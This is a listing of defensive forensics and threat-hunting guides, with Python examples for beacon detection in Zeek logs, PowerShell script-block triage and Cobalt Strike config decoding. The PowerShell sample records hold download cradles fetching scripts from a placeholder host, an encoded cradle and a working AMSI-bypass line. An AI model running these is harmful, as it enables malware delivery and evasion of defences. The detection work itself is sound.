by mukul975
analyzing-ransomware-network-indicators helps analyze Zeek conn.log and NetFlow to spot C2 beaconing, Tor exit traffic, exfiltration, and suspicious DNS for Security Audit and incident response.
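As an added worked example (not part of the skill listed above), the two conn.log checks a responder runs first: beacon scoring by the regularity of connection start times per (source, destination, port) tuple, and an outbound-heavy byte-ratio check for exfiltration candidates. The conn.log excerpt is constructed, and the thresholds (minimum connection count, coefficient-of-variation cutoff, byte volume and ratio) are tuning assumptions, not values from the skill.

```python
"""Beacon and exfiltration triage over a Zeek conn.log excerpt (TSV with a #fields header)."""
import statistics
from collections import defaultdict

# Constructed conn.log excerpt (not real traffic). Zeek writes one TSV row per
# connection, names the columns in a '#fields' header and uses '-' for unset values.
SAMPLE_CONN_LOG = """#separator \\x09
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes\tconn_state
1700000000.000\tCa1\t10.0.0.5\t51000\t203.0.113.7\t443\ttcp\tssl\t0.52\t1180\t320\tSF
1700000060.412\tCa2\t10.0.0.5\t51004\t203.0.113.7\t443\ttcp\tssl\t0.49\t1180\t320\tSF
1700000119.877\tCa3\t10.0.0.5\t51009\t203.0.113.7\t443\ttcp\tssl\t0.51\t1180\t320\tSF
1700000180.203\tCa4\t10.0.0.5\t51013\t203.0.113.7\t443\ttcp\tssl\t0.50\t1180\t320\tSF
1700000240.094\tCa5\t10.0.0.5\t51017\t203.0.113.7\t443\ttcp\tssl\t0.48\t1180\t320\tSF
1700000299.688\tCa6\t10.0.0.5\t51021\t203.0.113.7\t443\ttcp\tssl\t0.53\t1180\t320\tSF
1700000360.311\tCa7\t10.0.0.5\t51026\t203.0.113.7\t443\ttcp\tssl\t0.50\t1180\t320\tSF
1700000005.000\tCb1\t10.0.0.9\t49200\t198.51.100.20\t443\ttcp\tssl\t3.1\t4200\t91000\tSF
1700000012.000\tCb2\t10.0.0.9\t49201\t198.51.100.20\t443\ttcp\tssl\t1.0\t900\t15000\tSF
1700000200.000\tCb3\t10.0.0.9\t49240\t198.51.100.20\t443\ttcp\tssl\t8.7\t6100\t240000\tSF
1700000230.000\tCb4\t10.0.0.9\t49244\t198.51.100.20\t443\ttcp\tssl\t0.4\t700\t2100\tSF
1700000900.000\tCb5\t10.0.0.9\t49300\t198.51.100.20\t443\ttcp\tssl\t2.2\t3000\t48000\tSF
1700001500.000\tCb6\t10.0.0.9\t49388\t198.51.100.20\t443\ttcp\tssl\t1.9\t2800\t39000\tSF
1700000700.000\tCc1\t10.0.0.7\t50122\t192.0.2.44\t8443\ttcp\t-\t612.0\t52000000\t4100\tSF
#close\t2023-11-14-22-25-00
"""


def parse_conn_log(text):
    """Parse Zeek TSV into dicts keyed by the #fields names; '-' becomes None."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split("\t")
            rows.append({k: (None if v == "-" else v) for k, v in zip(fields, values)})
    return rows


def find_beacons(rows, min_conns=6, max_cv=0.15):
    """Score each (src, dst, port) tuple by how regular its connection start times are.

    A low coefficient of variation (stdev / mean) of the inter-arrival gaps over enough
    connections is the classic beacon signature; the thresholds are tuning assumptions.
    """
    stamps = defaultdict(list)
    for r in rows:
        stamps[(r["id.orig_h"], r["id.resp_h"], r["id.resp_p"])].append(float(r["ts"]))
    results = {}
    for key, ts in stamps.items():
        if len(ts) < min_conns:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        results[key] = {"count": len(ts), "mean_gap_s": round(mean, 2),
                        "cv": round(cv, 4), "beacon": cv <= max_cv}
    return results


def find_exfil_candidates(rows, min_orig_bytes=10_000_000, min_ratio=10.0):
    """Flag destinations that receive far more from the host than they send back."""
    totals = defaultdict(lambda: [0, 0])
    for r in rows:
        key = (r["id.orig_h"], r["id.resp_h"], r["id.resp_p"])
        totals[key][0] += int(r["orig_bytes"] or 0)
        totals[key][1] += int(r["resp_bytes"] or 0)
    return {key: {"orig_bytes": o, "resp_bytes": p, "ratio": round(o / max(p, 1), 1)}
            for key, (o, p) in totals.items()
            if o >= min_orig_bytes and o / max(p, 1) >= min_ratio}


if __name__ == "__main__":
    conns = parse_conn_log(SAMPLE_CONN_LOG)
    for key, score in find_beacons(conns).items():
        print("beacon" if score["beacon"] else "irregular", key, score)
    for key, info in find_exfil_candidates(conns).items():
        print("exfil-candidate", key, info)
```

In the sample, the 10.0.0.5 to 203.0.113.7:443 tuple fires as a beacon (seven connections roughly 60 s apart, CV well under 0.01), the 10.0.0.9 tuple has the same count but irregular gaps and stays quiet, and the single 52 MB upload to 192.0.2.44:8443 is the only exfiltration candidate. Jittered beacons raise the CV, so in practice the cutoff is tuned against the sleep/jitter values seen in the environment rather than fixed at 0.15.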
by mukul975
extracting-memory-artifacts-with-rekall is a guide for analyzing Windows memory images with Rekall. It covers installation and usage patterns for finding hidden processes, injected code, suspicious VADs, loaded DLLs, and network activity for Digital Forensics. Rekall is no longer actively maintained, so confirm it handles your image's Windows build before relying on its output.
by mukul975
detecting-process-hollowing-technique helps hunt process hollowing (T1055.012) in Windows telemetry by correlating suspended launches, memory tampering, parent-child anomalies, and API evidence. Built for threat hunters, detection engineers, and responders who need a practical process-hollowing hunting workflow for Threat Hunting.
by mukul975
detecting-fileless-attacks-on-endpoints helps build detections for memory-only attacks on Windows endpoints, including PowerShell abuse, WMI persistence, reflective loading, and process injection. Use it for Security Audit, threat hunting, and detection engineering with Sysmon, AMSI, and PowerShell logging.
by mukul975
The analyzing-windows-amcache-artifacts skill parses Windows Amcache.hve data to recover evidence of program execution, installed software, device activity, and driver loading for DFIR and security audit workflows. It uses AmcacheParser and regipy-based guidance to support artifact extraction, SHA-1 correlation, and timeline review.
by mukul975
The analyzing-powershell-script-block-logging skill parses Windows PowerShell Script Block Logging events (Event ID 4104) from EVTX files, reconstructs script blocks that were split across multiple events, and flags obfuscated commands, encoded payloads, Invoke-Expression abuse, download cradles, and AMSI bypass attempts for Security Audit work.
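As an added example (not the skill's own code), the reassembly and flagging steps the description names, run over records in the shape an EVTX parser hands back: 4104 events carrying the same ScriptBlockId are stitched together in MessageNumber order and checked against MessageTotal for missing parts, then scanned for the indicator classes listed above, with `-EncodedCommand` and `FromBase64String` arguments decoded (UTF-16LE first, as PowerShell expects) and rescanned. The records, the regular expressions and the indicator names are this example's own constructions.

```python
"""Reassemble PowerShell Script Block Logging (Event ID 4104) records and flag suspicious content."""
import base64
import re
import string
from collections import defaultdict

# Constructed 4104 records in the shape an EVTX parser (python-evtx, EvtxECmd JSON export)
# hands back; keys follow the event's EventData fields. Not real telemetry.
_INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
_B64 = base64.b64encode(_INNER.encode("utf-16le")).decode()
SAMPLE_4104 = [
    {"ScriptBlockId": "aaaa-1", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "IEX $c.DownloadString('http://example.invalid/stage2.ps1')"},
    {"ScriptBlockId": "aaaa-1", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$c = New-Object Net.WebClient\n"},
    {"ScriptBlockId": "bbbb-2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"ScriptBlockId": "cccc-3", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "powershell.exe -nop -w hidden -enc " + _B64},
    {"ScriptBlockId": "dddd-4", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": r"Get-ChildItem C:\Temp | Where-Object Length -gt 1MB"},
    {"ScriptBlockId": "eeee-5", "MessageNumber": 1, "MessageTotal": 3,
     "ScriptBlockText": "$x = 'a' + "},
    {"ScriptBlockId": "eeee-5", "MessageNumber": 3, "MessageTotal": 3,
     "ScriptBlockText": "Invoke-Expression $x"},
]

# Indicator patterns; the class names are this example's own labels.
INDICATORS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I),
    "encoded_payload": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}|frombase64string", re.I),
    "amsi_bypass": re.compile(r"amsiutils|amsiinitfailed|amsiscanbuffer|amsi\.dll", re.I),
    "obfuscation": re.compile(r"\[char\]\s*\d+|[a-z]`[a-z]|\{\d+\}.*-f\s", re.I),
}
B64_ARG = re.compile(r"(?:-e(?:nc(?:odedcommand)?)?\s+|frombase64string\(\s*['\"])([A-Za-z0-9+/=]{16,})", re.I)


def _looks_like_text(s):
    return bool(s) and sum(ch in string.printable for ch in s) / len(s) > 0.9


def decode_embedded_base64(text):
    """Decode -EncodedCommand / FromBase64String arguments; PowerShell expects UTF-16LE."""
    decoded = []
    for m in B64_ARG.finditer(text):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for codec in ("utf-16le", "utf-8"):
            try:
                s = raw.decode(codec)
            except UnicodeDecodeError:
                continue
            if _looks_like_text(s):
                decoded.append(s)
                break
    return decoded


def reassemble_script_blocks(records):
    """Group 4104 records by ScriptBlockId and stitch parts in MessageNumber order."""
    by_id = defaultdict(list)
    for r in records:
        by_id[r["ScriptBlockId"]].append(r)
    blocks = {}
    for sbid, parts in by_id.items():
        parts.sort(key=lambda r: int(r["MessageNumber"]))
        expected = set(range(1, int(parts[0]["MessageTotal"]) + 1))
        seen = {int(p["MessageNumber"]) for p in parts}
        blocks[sbid] = {"text": "".join(p["ScriptBlockText"] for p in parts),
                        "complete": seen == expected, "missing": sorted(expected - seen)}
    return blocks


def flag_script(text):
    """Return sorted indicator names hit by the text and by any embedded base64 it carries."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    for inner in decode_embedded_base64(text):
        hits |= {"decoded:" + name for name, rx in INDICATORS.items() if rx.search(inner)}
    return sorted(hits)


def triage(records):
    blocks = reassemble_script_blocks(records)
    for block in blocks.values():
        block["flags"] = flag_script(block["text"])
    return blocks


if __name__ == "__main__":
    for sbid, block in triage(SAMPLE_4104).items():
        status = "complete" if block["complete"] else f"missing parts {block['missing']}"
        print(sbid, status, block["flags"] or "no indicators")
```

Reassembly matters because a cradle split across two events ("New-Object Net.WebClient" in part 1, "IEX ... DownloadString" in part 2) only shows its full shape once joined, and an incomplete block (here, part 2 of eeee-5 never logged) should be reported as such rather than silently scanned as if whole. Only the decoded form of the `-enc` payload reveals the cradle, which is why the decoded hits are labelled separately.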
by mukul975
analyzing-network-traffic-of-malware helps inspect PCAPs and telemetry from sandbox runs or incident response to find C2, exfiltration, payload downloads, DNS tunneling, and detection ideas. It is a practical guide for Security Audit and malware triage.
by mukul975
analyzing-malicious-url-with-urlscan helps analysts triage suspicious links with URLScan.io, inspect redirects, screenshots, DOM content, and network calls, and turn results into IOCs and a clear security decision. Use this guide for phishing response, URL analysis, and Security Audit workflows.
by mukul975
analyzing-heap-spray-exploitation helps analyze heap spray exploitation in memory dumps with Volatility3. It identifies NOP sled patterns, suspicious large allocations, shellcode landing zones, and process VAD evidence for Security Audit, malware triage, and exploit validation.
by mukul975
analyzing-cobalt-strike-beacon-configuration helps extract and analyze Cobalt Strike beacon configuration from PE files, shellcode, and memory dumps to identify C2 infrastructure, sleep/jitter, user-agent, watermark, and malleable profile details for Security Audit, threat hunting, and incident response.
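As an added example (not the skill's own code), the decoding step behind the configuration extraction described above: Beacon stores its settings as big-endian TLV records (2-byte index, 2-byte type, 2-byte length, value) masked with a single XOR byte, 0x69 in 3.x and 0x2e in 4.x. Scanning for the masked first record (BeaconType, index 1, short, length 2) under each key finds the block; unmasking and walking the records yields the C2 server, port, sleep, jitter, user-agent and watermark. The field indices and type codes are the ones used by the public Beacon config parsers; the sample blob is constructed here, with documentation addresses and a made-up watermark, and is not a real sample. Real samples usually keep the config inside a packed or encrypted stager, so in practice the bytes come from a memory dump or an unpacked payload.

```python
"""Locate and decode a Cobalt Strike Beacon configuration block from raw bytes."""
import struct

# Beacon configs are big-endian TLV records (index, type, length, value), XOR-masked with one
# byte: 0x69 for 3.x builds, 0x2e for 4.x. Indices/type codes follow the public parsers;
# the sample blob built below is constructed for this example and is not a real sample.
XOR_KEYS = (0x2E, 0x69)
TYPE_SHORT, TYPE_INT, TYPE_BYTES = 1, 2, 3
FIELD_NAMES = {1: "BeaconType", 2: "Port", 3: "SleepTime", 4: "MaxGetSize", 5: "Jitter",
               8: "C2Server", 9: "UserAgent", 10: "HttpPostUri", 37: "Watermark"}
BEACON_TYPES = {0: "HTTP", 1: "Hybrid HTTP DNS", 2: "SMB", 4: "TCP", 8: "HTTPS", 16: "Bind TCP"}
# Every config opens with index 1 (BeaconType), type 1 (short), length 2.
CONFIG_MAGIC = b"\x00\x01\x00\x01\x00\x02"


def _tlv(index, typ, value):
    if typ == TYPE_SHORT:
        data = struct.pack(">H", value)
    elif typ == TYPE_INT:
        data = struct.pack(">I", value)
    else:
        data = value
    return struct.pack(">HHH", index, typ, len(data)) + data


def build_sample_config(key=0x2E):
    """Constructed stand-in for a dumped Beacon: junk header, masked config, trailing zeros."""
    plain = b"".join([
        _tlv(1, TYPE_SHORT, 8),                                   # HTTPS beacon
        _tlv(2, TYPE_SHORT, 443),
        _tlv(3, TYPE_INT, 60000),                                 # sleep in ms
        _tlv(5, TYPE_SHORT, 20),                                  # jitter percent
        _tlv(8, TYPE_BYTES, b"203.0.113.7,/jquery-3.3.1.min.js".ljust(256, b"\x00")),
        _tlv(9, TYPE_BYTES, b"Mozilla/5.0 (Windows NT 10.0; Win64; x64)".ljust(128, b"\x00")),
        _tlv(37, TYPE_INT, 0x12345678),                           # made-up watermark
    ])
    masked = bytes(b ^ key for b in plain)
    return b"MZ\x90\x00" + b"\x00" * 64 + masked + b"\x00" * 32


def find_config(blob):
    """Return (offset, key) of the masked config header, trying each known XOR key."""
    for key in XOR_KEYS:
        needle = bytes(b ^ key for b in CONFIG_MAGIC)
        off = blob.find(needle)
        if off != -1:
            return off, key
    return None


def parse_config(blob):
    """Unmask from the header onward and walk TLV records until the structure stops making sense."""
    hit = find_config(blob)
    if hit is None:
        return None
    off, key = hit
    data = bytes(b ^ key for b in blob[off:])
    fields, pos = {"xor_key": key, "offset": off}, 0
    while pos + 6 <= len(data):
        index, typ, length = struct.unpack_from(">HHH", data, pos)
        pos += 6
        if index == 0 or typ not in (TYPE_SHORT, TYPE_INT, TYPE_BYTES) or pos + length > len(data):
            break  # padding or unrelated bytes: end of the config block
        raw = data[pos:pos + length]
        pos += length
        if typ == TYPE_SHORT:
            value = struct.unpack(">H", raw)[0]
        elif typ == TYPE_INT:
            value = struct.unpack(">I", raw)[0]
        else:
            value = raw.rstrip(b"\x00").decode("latin-1")
        fields[FIELD_NAMES.get(index, f"field_{index}")] = value
    if "BeaconType" in fields:
        fields["BeaconType"] = BEACON_TYPES.get(fields["BeaconType"], fields["BeaconType"])
    return fields


if __name__ == "__main__":
    for name, value in parse_config(build_sample_config()).items():
        print(f"{name:12} {value}")
```

The C2Server string carries the host and the GET URI separated by a comma, and SleepTime is in milliseconds, so the sample decodes to a 60 s sleep with 20 % jitter against 203.0.113.7 over HTTPS. Scanning for the masked header is also what makes this usable on raw memory: the surrounding PE structure is irrelevant, and a miss under both keys is a signal that the config is still packed or that the build uses a different mask.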